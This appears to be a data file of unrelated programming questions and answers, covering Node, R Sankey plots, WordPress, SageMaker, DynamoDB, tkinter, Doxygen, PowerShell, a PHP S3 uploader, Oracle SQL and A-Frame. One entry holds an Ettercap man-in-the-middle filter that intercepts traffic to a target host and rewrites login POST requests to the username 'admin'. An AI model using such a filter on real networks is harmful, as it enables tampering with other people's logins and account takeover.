instruction stringlengths 0 30k ⌀ |
|---|
You have to use `node:querystring` module to build query params. I assume you are using commonJS if you use ESM simple change the import.
According to [RFC 7231 section 3.1.5.5](https://www.rfc-editor.org/rfc/rfc7231#section-3.1.1.5),
**`Content-Type`** HTTP header should be set only for PUT and POST requests, doesn't required for GET request
const queryBuilder = require('node:querystring');
const params = queryBuilder.stringify({arr:[1,2]}); // gives arr=1&arr=2
let request = await Request.get('url?'+params);
[NODEJS DOC](https://nodejs.org/api/querystring.html)
|
I’m trying to get this Ettercap filter to work which has worked in the past but it seems Ettercap no longer accepts it? It’s supposed to change the username given to admin:
if (ip.dst == ‘192.###.##.#' && tcp.dst == 80) {
if(search(DATA.data, "POST")){
msg("request POST");
if (search(DATA.data, "login.php")){
msg("Call to the login page");
pcre_regex(DATA.data, "Content-Length: [0-9]*","Content-Length: 41");
msg("Content modified");
if (pcre_regex(DATA.data, "username=[a-zA-Z]*&","username=admin&")){
msg("Data modified\n");
}
msg("Done !\n");
}
}
}
I also tried using replace and execinject, the code runs and the messages are displayed, but nothing gets replaced.
Please helpp!!
Sincerely,
Marco
I already tried a ton docs and solutions online and nothing :/ |
{"Voters":[{"Id":17865804,"DisplayName":"Chris"}]} |
I am using the sankeyNetwork function to create a diagram of very simple flow data. Even using multiple iterations, the resulting diagram has obviously unnecessary crossovers.
I ran this code in R Studio 2023.06.2+561 with R version 4.3.1 (2023-06-16).
```r
library(networkD3)
source<-c(0,1,2,0)
target<-c(3,3,4,4)
value<-c(13320, 274, 10950, 96000)
links<-data.frame(source, target, value)
nodes<-data.frame(names=c('Solar', 'Wind', 'Natural Gas', 'Electricity', 'Hydrogen'))
p <- sankeyNetwork(Links = links, Nodes = nodes, Source = "source",
Target = "target", Value = "value", NodeID = "names", iterations=32,
units = "TWh", fontSize = 12, nodeWidth = 30, sinksRight = FALSE)
```
The resulting Sankey Diagram has an obviously avoidable crossing: if "Wind" were above "Solar" then there would be no crossings. I've tried 1000 iterations and it doesn't do anything - which has me wondering if the issue is the platform or R Studio -- since 1000 iterations should be slower than 1.
[Resulting Sankey Plot](https://i.stack.imgur.com/cD1sC.png) |
|r|d3.js|sankey-diagram|networkd3| |
In WordPress, when I input a title for a post and save it, then a slug will automatically generated based on the title. After searching online, I find it is implemented via sanitize_title, so I try to port it to Delphi.
But after checking its source code:
```php
function sanitize_title( $title, $fallback_title = '', $context = 'save' ) {
$raw_title = $title;
if ( 'save' === $context ) {
$title = remove_accents( $title );
}
/**
* Filters a sanitized title string.
*
* @since 1.2.0
*
* @param string $title Sanitized title.
* @param string $raw_title The title prior to sanitization.
* @param string $context The context for which the title is being sanitized.
*/
$title = apply_filters( 'sanitize_title', $title, $raw_title, $context );
if ( '' === $title || false === $title ) {
$title = $fallback_title;
}
return $title;
}
```
I cannot find any codes that perform the replacement of whitespace to '-'.
1. remove_accents only remove accents, not related to whitespace.
2. apply_filters is apply a filter, if there is no filter, then nothing happens.
Other than these two ,there are no codes make the transform. Why? |
to do this first start your jupyter instance and then run the on-create script, install the custom python script in the section that is installing it.
https://github.com/aws-samples/amazon-sagemaker-notebook-instance-lifecycle-config-samples/blob/master/scripts/persistent-conda-ebs/on-create.sh
then add this to on-start of your life cycle config and add this lifecycle config to your notebook instance
#!/bin/bash
set -e
#
# PARAMETERS
IDLE_TIME=3600
echo "Fetching the autostop script"
wget https://raw.githubusercontent.com/aws-samples/amazon-sagemaker-notebook-instance-lifecycle-config-samples/master/scripts/auto-stop-idle/autostop.py
echo "Detecting Python install with boto3 install"
# Find which install has boto3 and use that to run the cron command. So will use default when available
# Redirect stderr as it is unneeded
CONDA_PYTHON_DIR=$(source /home/ec2-user/anaconda3/bin/activate /home/ec2-user/anaconda3/envs/JupyterSystemEnv && which python)
PYTHON_DIR='/usr/bin/python'
echo "Found boto3 at $PYTHON_DIR"
echo "Starting the SageMaker autostop script in cron"
(crontab -l 2>/dev/null; echo "*/5 * * * * $PYTHON_DIR $PWD/autostop.py --time $IDLE_TIME --ignore-connections >> /var/log/jupyter.log") | crontab -
#
sudo -u ec2-user -i <<'EOF'
unset SUDO_UID
WORKING_DIR=/home/ec2-user/SageMaker/custom-miniconda/
source "$WORKING_DIR/miniconda/bin/activate"
for env in $WORKING_DIR/miniconda/envs/*; do
BASENAME=$(basename "$env")
source activate "$BASENAME"
python -m ipykernel install --user --name "$BASENAME" --display-name "Custom ($BASENAME)"
done
# Optionally, uncomment these lines to disable SageMaker-provided Conda functionality.
# echo "c.EnvironmentKernelSpecManager.use_conda_directly = False" >> /home/ec2-user/.jupyter/jupyter_notebook_config.py
# rm /home/ec2-user/.condarc
EOF
echo "Restarting the Jupyter server.."
systemctl restart jupyter-server |
How to implement the following COUNTIF function into POWER BI? |
|excel|powerbi| |
I have the following data
| Partition key | Sort key | value |
| ------------- | -------- | ----- |
| aa | str1 | 1 |
| aa | str2 | 123 |
| aa | str3 | 122 |
| ab | str1 | 12 |
| ab | str3 | 111 |
| ac | str1 | 112 |
And by using `QueryRequest` I want to select entries where the partition key is "aa" and the sort key is either "str1" or "str3". I have tried to create a `Condition`, but nothing works with different exceptions, so could someone point out how this query can be written?
```cs
var pkCondition = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { S = "aa" },
},
};
// Exception One or more parameter values were invalid: Condition parameter type does not match schema type
var skCondition1 = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { SS = { "str1", "str3" } },
},
};
// Exception: One or more parameter values were invalid: Invalid number of argument(s) for the EQ ComparisonOperator
var skCondition2 = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { S = "str1" },
new AttributeValue { S = "str3" },
},
};
// Well this one is clear because IN cannot be performed on keys
// Exception: One or more parameter values were invalid: ComparisonOperator IN is not valid for SS AttributeValue type
var skCondition3 = new Condition
{
ComparisonOperator = ComparisonOperator.IN,
AttributeValueList =
{
new AttributeValue { SS = { "str1", "str3" } },
},
};
// Works, but not what I need
var skCondition4 = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { S = "str1" },
},
};
return new QueryRequest
{
TableName = "My table",
KeyConditions =
{
{ "Partition key", pkCondition },
{ "Sort key", skCondition },
},
};
```
After some research I have found out that `KeyConditionExpression` can also be used, but I have not found any combination that could work for my case.
```cs
// Exception: Invalid operator used in KeyConditionExpression: OR
const string keyConditionExpression1 = "#pk = :pkval AND (#sk = :sk1 OR #sk = :sk2)";
// Exception: Invalid operator used in KeyConditionExpression: IN
const string keyConditionExpression2 = "#pk = :pkval AND #sk IN (:sk1, :sk2)";
new QueryRequest
{
TableName = "My table",
KeyConditionExpression = keyConditionExpression,
ExpressionAttributeNames = new Dictionary<string, string>
{
{ "#pk", "Partition key" },
{ "#sk", "Sort key" },
},
ExpressionAttributeValues = new Dictionary<string, AttributeValue>
{
{ ":pkval", new AttributeValue { S = "aa" } },
{ ":sk1", new AttributeValue { S = "str1" } },
{ ":sk2", new AttributeValue { S = "str3" } },
},
};
```
Next, I have also tried using `FilterExpression` where IN and OR are allowed, but again there was another exception: `Filter Expression can only contain non-primary key attributes`.
```cs
new QueryRequest
{
TableName = "My table",
KeyConditionExpression = "#pk = :pkval",
FilterExpression = "#sk IN (:sk1, :sk2)",
ExpressionAttributeNames = new Dictionary<string, string>
{
{ "#pk", "Partition key" },
{ "#sk", "Sort key" },
},
ExpressionAttributeValues = new Dictionary<string, AttributeValue>
{
{ ":pkval", new AttributeValue { S = "aa" } },
{ ":sk1", new AttributeValue { S = "str1" } },
{ ":sk2", new AttributeValue { S = "str3" } },
},
};
```
EDIT:
Giving it another thought. Maybe DynamoDB allows multiple entries for the "Partition key" and "Sort key" pair, so in this case probably my table structure is not correct and I should go only with the "Partition key" approach where the current "Sort key" will not be part of the key, but a normal attribute that can be used in `"FilterExpression"`. I will test it. |
I have a simple ui, which should print every key that I've pressed.
I need to generate signal **once** per real key-press.
How can I achieve that?
In default, tkinter generates signal once, than waits about 0.5 sec and starts generate signal in loop, until *KeyRelease* event happens.
```
if __name__ == '__main__':
from tkinter import Tk, Frame
root = Tk()
frame = Frame(root, width=200, height=200, bg="white")
frame.pack()
def key_handler(event):
print(event.char, event.keysym, event.keycode)
return 'break'
root.bind('<Key>', key_handler)
root.mainloop()
```
Using 'break' at the end of the bond function doesn't stop the next event-call.
In addition (bc this is a minor question, which is too small for separate post), how can I create these key sequences?:
- "Shift" and some digit
- some digit and '+' or '-' symbol
|
How to generate a single key-press event signal with tkinter.bind method |
|python|python-3.x|user-interface|tkinter|signals| |
I'm documenting a (C++) library of mine with doxygen comments.
In this library, I have some cases of overloads of the same function, doing the same thing but with different inputs, e.g.
```
void frobincate(int x);
void frobincate(float f);
```
I've noticed Doxygen has group begin and end commands,`///@{` and `///@}`, and so I naively write:
```
/// @brief Perform frobnication
/// @param s just some string
///@{
/// @param x an important value
void frobincate(char const* s, int x);
/// @param f a magical value
void frobincate(char const* s, float f);
///@}
```
However, looking at the doxygen [documentation for this kind of grouping][1] and the [generated output sample][2], it seems that the group-level commands I specified do not apply to _any_ group members - just to the group-level documentation. And, in fact, I am not interested in drawing special attention to `frobnicate()` - it's simply a function with more than a single possible type combination of input parameters.
Is there a way for me to not-repeat-myself w.r.t. function documentation, on one hand, but have that documentation text be applied to the actual function, on the other? Or must I resort to copy-and-paste?
[1]: https://www.doxygen.nl/manual/grouping.html#memgroup
[2]: https://www.doxygen.nl/manual/examples/memgrp/html/class_memgrp___test.html |
How can I avoid repeating myself in doxygen comments (unfortunately without member groups)? |
|c++|doxygen|dry|doxygen-member-groups| |
How to fix org.apache.commons.fileupload.FileUploadBase and SizeLimitExceededException in Struts 2 |
C:\Users\VssAdministrator\Downloads is the correct path for anyone else who might need to know this! |
Here's a PowerShell script and an AutoHotkey script based on lulle2007200's and MaloW's answers
SetBrightness.ps1
param(
[Parameter(Mandatory = $true, Position = 0,
HelpMessage = "Brightness value between 1.0 and 6.0")]
[ValidateRange(1.0, 6.0)][double]$brightness
)
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class ScreenBrightnessSetter
{
[DllImport("user32.dll")]
public static extern IntPtr MonitorFromWindow(IntPtr hwnd, uint dwFlags);
[DllImport("kernel32", CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true,
SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, int address);
public delegate void DwmpSDRToHDRBoostPtr(IntPtr monitor,
double brightness);
}
"@
$primaryMonitor = [ScreenBrightnessSetter]::MonitorFromWindow([IntPtr]::Zero, 1)
$hmodule_dwmapi = [ScreenBrightnessSetter]::LoadLibrary("dwmapi.dll")
$procAddress = [ScreenBrightnessSetter]::GetProcAddress($hmodule_dwmapi, 171)
$changeBrightness = (
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
$procAddress, [ScreenBrightnessSetter+DwmpSDRToHDRBoostPtr])
)
$changeBrightness.Invoke($primaryMonitor, $brightness)
SetBrightness.ahk
#Requires AutoHotkey v2.0
SetBrightness(value) {
cmd := 'powershell.exe -ExecutionPolicy Bypass -Command '
cmd .= '"& .\SetBrightness.ps1 ' . value . '"'
RunWait cmd, A_ScriptDir, "Hide"
}
>^>+1::SetBrightness(1)
>^>+2::SetBrightness(2)
>^>+3::SetBrightness(3)
>^>+4::SetBrightness(4)
>^>+5::SetBrightness(5)
>^>+6::SetBrightness(6)
|
#include <stdio.h>
#define N 10
int main() {
int a[N], i, pos;
printf("\n\nΕισαγωγή 10 ακεραίων\n");
for (i=0; i<N; i++) {
printf("%2d : ", i+1);
scanf("%d", &a[i]);
}
pos = 0;
for (i=1; i<N; i++) {
if (a[pos] < a[i]){
pos = i;
}
}
printf("\n\nΗ μέγιστη τιμή είναι %d και βρέθηκε στη θέση %d\n\n", a[pos],pos+1);
return 0;
}
This is the program/code that is found in my e-class' lectures and the thing that literally makes no sense for me, first of all, is the "i++" as "change condition" (I have no idea what is called in English) in "for" repetition statements twice, that normally/logically it is to be expected to add the "position"-variable I twice until it reaches N since we got two "for" repetition statement sand in the program and the "i+1" of printf in the first "for" repetition statement which is also repeated and should be also repeated. Logically, doesn't that add the position-variable "i" thrice in the program every time? Logically this is the thing is must do but when I run it this actually doesn't happen and it operates as we want it/expect it to.
Furthermore, I have queries about "a[pos]" that at the start is "a[0]" and with "pos+1".. Since there is no position 0 and we start from "i+1" with the printf function then what is the position 0 and what is its value? Is "i=1" the position 0? Furthermore since we got "pos=i" then why the final printf has to print one position after this with "pos+1"? Considering that every time the a[pos] value-variable is smaller than the a[i] value the position becomes equal with `i`.
This is the sum of my queries.
|
Formkit autoanimate doesnt work on my list.
My main.js:
> ``import { createApp } from 'vue';
> import App from './App.vue';
> import './styles/app.css';
> import components from '@/components/UI';
> import router from '@/router/index.js';
> import store from '@/store';
> import { autoAnimatePlugin } from '@formkit/auto-animate/vue'
>
> const app = createApp(App)
>
> components.forEach(component => {
> app.component(component.name, component)
> })
>
> app
> .use(autoAnimatePlugin)
> .use(router)
> .use(store)
> .mount('#app');`
> `
List:
> <div v-auto-animate>
> <HospitalItem v-for="hospital in hospitals" :hospital="hospital" :key="hospital._id"
> @deleteHospital="deleteEmit"> </HospitalItem>
> </div>
Please help me to fix this |
Formkit autoanimate doesnt work on my LIST |
|javascript|vue.js|animation|formkit| |
null |
I finally was able to fix errors from DigitalOcean own script.
Here is **working** curl:
space="nmmm-test"
REGION="ams3"
STORAGETYPE="STANDARD" # Storage type, can be STANDARD, REDUCED_REDUNDANCY, etc.
KEY="xxxx"
SECRET="xxxxxx"
path="/home/nmmm/"
file="despicable-me-2-minions_a-G-10438535-0.jpg"
space_path="/"
date=$(date +"%a, %d %b %Y %T %z")
acl="x-amz-acl:public-read" # private or public-read.
content_type="image/jpeg"
storage_type="x-amz-storage-class:${STORAGETYPE}"
string="PUT\n\n$content_type\n$date\n$acl\n$storage_type\n/$space$space_path$file"
signature=$(echo -en "${string}" | openssl sha1 -hmac "${SECRET}" -binary | base64)
curl -v -s -X PUT -T "$path/$file" \
-H "Host: $space.${REGION}.digitaloceanspaces.com" \
-H "Date: $date" \
-H "Content-Type: $content_type" \
-H "$storage_type" \
-H "$acl" \
-H "Authorization: AWS ${KEY}:$signature" \
"https://$space.${REGION}.digitaloceanspaces.com$space_path$file"
After that I did working PHP class
<?php
class S3Uploader{
private $s3_host; // ams3.digitaloceanspaces.com
private $s3_key;
private $s3_secret;
private $s3_bucket;
private $s3_storage_class;
private $s3_acl;
const ACL_PRIVATE = "private";
const ACL_PUBLIC = "public-read";
const SC_STANDARD = "STANDARD";
const DEBUG = false;
function __construct($s3_host, $s3_key, $s3_secret, $s3_bucket){
$this->s3_host = $s3_bucket . "." . $s3_host;
$this->s3_key = $s3_key;
$this->s3_secret = $s3_secret;
$this->s3_bucket = $s3_bucket;
$this->s3_storage_class = self::SC_STANDARD;
$this->s3_acl = self::ACL_PUBLIC;
}
function setStorageClass($s3_storage_class){
// STANDARD, REDUCED_REDUNDANCY, etc.
$this->s3_storage_class = $s3_storage_class;
}
function setAcl($acl){
// "private" or "public-read"
$this->s3_acl = $acl;
}
function setAclBool($acl){
if ($acl)
return setAcl(self::ACL_PUBLIC);
else
return setAcl(self::ACL_PRIVATE);
}
private static function date(){
return strftime("%a, %d %b %Y %T %z");
}
function uploadFile($src_file, $dst_file, $content_type){
$date = $this->date();
// space after : is ommited intentionally!!!
$acl = "x-amz-acl:" . $this->s3_acl;
$storage_class = "x-amz-storage-class:" . $this->s3_storage_class;
$string = "PUT\n" .
"\n" .
"$content_type\n" .
"$date\n" .
"$acl\n" .
"$storage_class\n" .
"/" . $this->s3_bucket . $dst_file
;
$signature = base64_encode(
hash_hmac("sha1", $string, $this->s3_secret, true)
);
$curl_headers = [
"Host:" . $this->s3_host ,
"Date:" . $date ,
"Content-Type:" . $content_type ,
$acl ,
$storage_class ,
"Authorization:" . "AWS " . $this->s3_key . ":" . $signature
];
$curl_url = "https://" . $this->s3_host . $dst_file;
$file_contents = file_get_contents($src_file);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $curl_url );
curl_setopt($curl, CURLOPT_CUSTOMREQUEST, "PUT" );
curl_setopt($curl, CURLOPT_POSTFIELDS, $file_contents );
curl_setopt($curl, CURLOPT_HTTPHEADER, $curl_headers );
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true );
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true );
if (self::DEBUG){
curl_setopt($curl, CURLOPT_HEADER, true );
curl_setopt($curl, CURLOPT_VERBOSE, true );
}
$result = curl_exec($curl);
if ($result === false) {
@curl_close($curl);
// int is more readable in print_r
return [
"ok" => 0 ,
"http_code" => 0 ,
"curl_error" => curl_errno($curl) ,
"message" => curl_error($curl)
];
}else{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
@curl_close($curl);
// int is more readable in print_r
return [
"ok" => $code == 200 ? 1 : 0 ,
"http_code" => $code ,
"curl_error" => curl_errno($curl) ,
"message" => $code == 200 ? "" : $result
];
}
}
};
$s3 = new S3Uploader("ams3.digitaloceanspaces.com", "xxxxx", "xxxxxx", "nmmm-test");
$r = $s3->uploadFile("/home/nmmm/despicable-me-2-minions_a-G-10438535-0.jpg", "/minion.jpg", "image/jpeg");
print_r($r);
|
Formkit autoanimate doesnt work on my list.
My main.js:
> import { createApp } from 'vue';
> import App from './App.vue';
> import './styles/app.css';
> import components from '@/components/UI';
> import router from '@/router/index.js';
> import store from '@/store';
> import { autoAnimatePlugin } from '@formkit/auto-animate/vue'
>
> const app = createApp(App)
>
> components.forEach(component => {
> app.component(component.name, component)
> })
>
> app
> .use(autoAnimatePlugin)
> .use(router)
> .use(store)
> .mount('#app');
>
List:
> <div v-auto-animate>
> <HospitalItem v-for="hospital in hospitals" :hospital="hospital" :key="hospital._id"
> @deleteHospital="deleteEmit"> </HospitalItem>
> </div>
Please help me to fix this |
I get an error in useRouteQuery and Vitest. How to solve? |
|javascript|vue.js|testing|vuejs3|vitest| |
null |
|gigya|sap| |
If you have the two tables either: both in the Oracle database; or have the MariaDB database accessible from the Oracle database (i.e. via a database link) then you can find all the relationships between the two tables using the query:
```lang-sql
WITH cardboard_bounds (id, cardboard_number, start_dt, end_dt, production_line) AS (
SELECT id,
cardboard_number,
date_time,
LEAD(date_time, 1, SYSTIMESTAMP) OVER (
PARTITION BY productionline_number
ORDER BY date_time
),
productionline_number
FROM cardboard
),
production_bounds (production_number, posnr, process_active, production_line, start_dt, end_dt) AS (
SELECT PRODUCTION_NUMBER,
POSNR,
PROCESS_ACTIVE,
PRODUCTION_LINE,
DATETIME as start_dt,
LEAD(DATETIME, 1, SYSTIMESTAMP) OVER (
PARTITION BY production_line
ORDER BY DATETIME ASC
) AS end_dt
FROM productions
)
SELECT p.production_number,
p.posnr,
p.process_active,
p.production_line,
GREATEST(p.start_dt, c.start_dt) AS start_dt,
LEAST(p.end_dt, c.end_dt) AS end_dt,
c.id,
c.cardboard_number
FROM production_bounds p
INNER JOIN cardboard_bounds c
ON p.production_line = c.production_line
AND p.start_dt < c.end_dt AND p.end_dt > c.start_dt
```
Which, for the sample data:
```lang-sql
CREATE TABLE cardboard
(
id int,
Cardboard_Number varchar2(100),
date_Time TIMESTAMP(0),
ProductionLine_Number int
);
INSERT INTO cardboard VALUES
(2,'WDL-005943998-1', TIMESTAMP '2014-08-05 10:03:32', 1),
(4,'spL1ml82N4o',TIMESTAMP '2024-02-29 17:13:54', 1),
(5,'WDL-005943998-1',TIMESTAMP '2024-03-01 09:44:42', 1),
(6,'WDL-005943998-1',TIMESTAMP '2024-03-01 10:34:57', 1),
(7,'950024027237',TIMESTAMP '2024-03-01 10:44:57', 1),
(8,'950024027237',TIMESTAMP '2024-03-01 10:52:57', 1),
(9,'WDL-005943998-1',TIMESTAMP '2024-03-01 13:58:43', 2),
(10,'WDL-005943998-1',TIMESTAMP '2024-03-01 13:58:46', 2),
(11,'spL1ml82N4o',TIMESTAMP '2024-03-01 14:09:43', 2),
(12,'WDL-005943998-1',TIMESTAMP '2024-03-12 15:48:36', 2);
CREATE TABLE Productions
(
PRODUCTION_NUMBER NUMBER,
POSNR NUMBER,
DATETIME TIMESTAMP(0),
PROCESS_ACTIVE VARCHAR2(1),
PRODUCTION_LINE NUMBER
);
BEGIN
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461793, 1, TO_TIMESTAMP('2014-08-04 09:01:41', 'YYYY-MM-DD HH24:MI:SS'), '1', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461793, 1, TO_TIMESTAMP('2014-08-04 11:01:41', 'YYYY-MM-DD HH24:MI:SS'), '0', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461618, 2, TO_TIMESTAMP('2014-08-05 10:01:41', 'YYYY-MM-DD HH24:MI:SS'), '1', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461619, 2, TO_TIMESTAMP('2014-08-05 10:02:46', 'YYYY-MM-DD HH24:MI:SS'), '1', 2);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461618, 2, TO_TIMESTAMP('2014-08-05 10:05:09', 'YYYY-MM-DD HH24:MI:SS'), '0', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461619, 2, TO_TIMESTAMP('2014-08-05 10:07:46', 'YYYY-MM-DD HH24:MI:SS'), '0', 2);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461818, 1, TO_TIMESTAMP('2014-08-14 22:53:12', 'YYYY-MM-DD HH24:MI:SS'), '1', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461818, 1, TO_TIMESTAMP('2014-08-14 23:25:30', 'YYYY-MM-DD HH24:MI:SS'), '0', 1);
END;
/
```
Outputs:
| PRODUCTION\_NUMBER | POSNR | PROCESS\_ACTIVE | PRODUCTION\_LINE | START\_DT | END\_DT | ID | CARDBOARD\_NUMBER |
| -----------------:|-----:|:--------------|---------------:|:--------|:------|--:|:----------------|
| 461618 | 2 | 1 | 1 | 2014-08-05 10:03:32. | 2014-08-05 10:05:09.000000 | 2 | WDL-005943998-1 |
| 461618 | 2 | 0 | 1 | 2014-08-05 10:05:09. | 2014-08-14 22:53:12.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 1 | 1 | 2014-08-14 22:53:12. | 2014-08-14 23:25:30.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2014-08-14 23:25:30. | 2024-02-29 17:13:54.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2024-02-29 17:13:54. | 2024-03-01 09:44:42.000000 | 4 | spL1ml82N4o |
| 461818 | 1 | 0 | 1 | 2024-03-01 09:44:42. | 2024-03-01 10:34:57.000000 | 5 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2024-03-01 10:34:57. | 2024-03-01 10:44:57.000000 | 6 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2024-03-01 10:44:57. | 2024-03-01 10:52:57.000000 | 7 | 950024027237 |
| 461818 | 1 | 0 | 1 | 2024-03-01 10:52:57. | 2024-03-28 12:20:50.832254 | 8 | 950024027237 |
| 461619 | 2 | 0 | 2 | 2024-03-01 13:58:43. | 2024-03-01 13:58:46.000000 | 9 | WDL-005943998-1 |
| 461619 | 2 | 0 | 2 | 2024-03-01 13:58:46. | 2024-03-01 14:09:43.000000 | 10 | WDL-005943998-1 |
| 461619 | 2 | 0 | 2 | 2024-03-01 14:09:43. | 2024-03-12 15:48:36.000000 | 11 | spL1ml82N4o |
| 461619 | 2 | 0 | 2 | 2024-03-12 15:48:36. | 2024-03-28 12:20:50.832254 | 12 | WDL-005943998-1 |
If you want to search for active rows with a specific `cardboard_number` then add those filters:
```lang-sql
WITH cardboard_bounds (id, cardboard_number, start_dt, end_dt, production_line) AS (
SELECT id,
cardboard_number,
date_time,
LEAD(date_time, 1, SYSTIMESTAMP) OVER (
PARTITION BY productionline_number
ORDER BY date_time
),
productionline_number
FROM cardboard
),
production_bounds (production_number, posnr, process_active, production_line, start_dt, end_dt) AS (
SELECT PRODUCTION_NUMBER,
POSNR,
PROCESS_ACTIVE,
PRODUCTION_LINE,
DATETIME as start_dt,
LEAD(DATETIME, 1, SYSTIMESTAMP) OVER (
PARTITION BY production_line
ORDER BY DATETIME ASC
) AS end_dt
FROM productions
)
SELECT p.production_number,
p.posnr,
p.process_active,
p.production_line,
GREATEST(p.start_dt, c.start_dt) AS start_dt,
LEAST(p.end_dt, c.end_dt) AS end_dt,
c.id,
c.cardboard_number
FROM production_bounds p
INNER JOIN cardboard_bounds c
ON p.production_line = c.production_line
AND p.start_dt < c.end_dt AND p.end_dt > c.start_dt
WHERE cardboard_number = 'WDL-005943998-1'
AND process_active = 1
```
Which outputs:
| PRODUCTION\_NUMBER | POSNR | PROCESS\_ACTIVE | PRODUCTION\_LINE | START\_DT | END\_DT | ID | CARDBOARD\_NUMBER |
| -----------------:|-----:|:--------------|---------------:|:--------|:------|--:|:----------------|
| 461618 | 2 | 1 | 1 | 2014-08-05 10:03:32. | 2014-08-05 10:05:09.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 1 | 1 | 2014-08-14 22:53:12. | 2014-08-14 23:25:30.000000 | 2 | WDL-005943998-1 |
[fiddle](https://dbfiddle.uk/jHkQWqLt)
|
If the software that you use to open the content allows opening anything other than file then yes. It may be a named or unnamed pipe, shared memory, OLE IStream interface, etc.
Otherwise it may be complicated but [still possible][1].
In the worst case you can use ordinary temporary files but do not forget to use flags FILE_FLAG_DELETE_ON_CLOSE and FILE_ATTRIBUTE_TEMPORARY to avoid polluting file system.
[1]: https://learn.microsoft.com/en-us/windows/win32/projfs/projected-file-system |
**Solution:**
var keyValueObjectArray = [
{ key: "foo", val: "bar" },
{ key: "hello", val: "world" },
];
//array
var keyValueArray = keyValueObjectArray.map((elm) => [elm.key, elm.val]);
//console.log(keyValueArray);
//array to map
var keyValueMap = new Map(keyValueArray);
//console.log(keyValueMap);
//map to object
var result = {}
for (const [key, value] of keyValueMap) {
result[key] = value
}
console.log(result)
**Output:**
{ foo: 'bar', hello: 'world' }
|
I have a nested Data structure in my DynamoDB Table that looks like this
```
"filter": {
"M": {
"foo": {
"NS": [
"2"
]
},
"bar": {
"NS": [
"456"
]
},
"basz": {
"NS": [
"0"
]
},
"fool": {
"NS": [
"2"
]
},
"version": {
"SS": [
"VersionBest"
]
}
}
},
```
and created a Dynamoose Schema like this:
```
filter: {
type: Object,
schema: {
foo: {
type: Set,
schema: [Number],
},
bar: {
type: Set,
schema: [Number],
},
basz: {
type: Set,
schema: [Number],
},
fool: {
type: Set,
schema: [Number],
},
version: {
type: Set,
schema: [String],
},
},
},
```
When I perform a scan via the Model i do not get the data from the sets. Instead it is empty like this:
```
"filter": {
"foo": {},
"bar": {},
"basz": {},
"fool": {},
"version": {}
},
```
I tried creating an own schema for the Filterattributes and passing it to the filter object but this did not help. When i change araound the schema i got following error: `Expected filter.foo to be of type object, instead found type object.`
How can i make Sets work in a nested schema ? |
Problems with Sets in Nested Schemas with Dynamoose |
|amazon-dynamodb|dynamoose| |
null |
Use private property called _customMaxItems on UITabBarController
Example:
```swift
final class CustomTabBarController: UITabBarController {
private var customMaxItems: CGFloat {
get {
self.value(forKey: "_customMaxItems") as! CGFloat
}
set {
self.setValue("_customMaxItems", forKey: key)
}
}
override func viewDidLoad() {
super.viewDidLoad()
self.customMaxItems = 10
}
}
```
|
Ettercap pcre_regex or replace not working anymore |
|ettercap| |
null |
I've encountered an issue where SwiftData remains in the /Users/(username)/Library/Containers/MyApp directory even after my app has been deleted.(other apps too) This behavior is not what I expected.
Has anyone else faced this issue? Also, I'm wondering if there is a delay in the deletion process that might account for this. is there a known time lag before everything is cleared out?
Thanks. |
Persistent SwiftData in 'Library/Containers' Directory After App Uninstallation on macOS |
|swift|macos|swift-data| |
Good day!
My Api returns byte variable like this "..." but retrofit in my android application can read only like this [...] how can i change response.
Entity:
```
@Entity
@Table(name = "book")
public class bookEntity {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
private long books_id;
private String title;
private String description;
@Column(columnDefinition = "LONGBLOB")
private byte[] cover;
```
Service:
```
public Iterable<bookEntity> findAll()
{
return bookRepository.findAll();
}
```
Controller:
```
@GetMapping
public ResponseEntity getAllBook()
{
return ResponseEntity.ok(bookService.findAll());
}
```
|
Spring Java API returning byte[] variable with "" |
|spring|spring-boot|spring-data-jpa| |
null |
Also, pay attention to which flavor of your application you are building, since some of them might have set
```
applicationIdSuffix
``` |
null |
I tried using your code within a scene and it works fine. My suspect is that there is something wrong in some other parts of the code, probably in regards to the cursor/raycaster.
Anyway, this is a working sample:
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-html -->
<html>
<head>
<script src="https://aframe.io/releases/1.5.0/aframe.min.js"></script>
</head>
<body>
<a-scene>
